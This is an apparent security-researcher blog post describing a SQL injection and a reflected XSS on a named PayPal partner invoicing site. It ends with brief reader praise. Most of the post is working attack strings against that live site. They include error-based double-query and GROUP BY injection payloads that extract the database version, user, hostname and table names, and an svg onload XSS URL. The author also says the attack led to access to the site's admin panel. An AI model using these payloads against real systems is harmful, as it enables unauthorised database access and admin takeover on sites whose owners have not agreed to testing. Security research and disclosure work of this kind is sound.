Paypal Partner SQL Injection
One of the Paypal Partner websites http://ppinvoice.com/ was suffering from a POST SQL injection. Union injection was impossible in here.
[code language=”sql”]
LoginForm[email]=-1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]
As we cannot continue with the above error, double query injection works perfectly.
[code language=”sql”]
LoginForm[email]=1′ and(select 1 from(select count(*),concat((select
(select concat(0x7e,0x27,cast(version() as char), 0x27,0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]
[code language=”sql”]
LoginForm[email]=1′ or 1 GROUP BY concat_ws(‘ :: ‘,version(),
user(),database(),@@license,@@hostname,floor(rand(0)*2)) having min(0) or
1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]
However, dumping the database was quite easy since there were no WAFs or any kind of filtering happening. Out of the tables let’s check out the admin table.
[code language=”sql”]
LoginForm[email]=1′ or (@:=1)||@ group by concat((select substr
(group_concat(‘ :: ‘,table_name),1,450) from information_schema.tables
WHERE table_schema=database()),@:=@-1)having @||min(@:=0)%23&LoginForm
[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]
So Finally I was able to log into their admin panel 😉
That’s not all there is also a reflected XSS.
[code language=”text”]http://ppinvoice.com/index.php/faq/faqlist?id=4?><svg/onload=”prompt(‘Hello There’)”>[/code]
It states about Cisco too in Copyright.
However, I reported Paypal and they said it’s out of scope. Well, I recently saw another researcher who had found some issues in another Paypal Partner website running SILK software was accepted while mine was not. The issue seems to be in SILK software. It seems like they are a third party to Paypal. They are also a Magento Solution Provider according their webpage.
You always make awesome thing. Great bro,Keep in hunting.
sweet stuff bro, awesome like always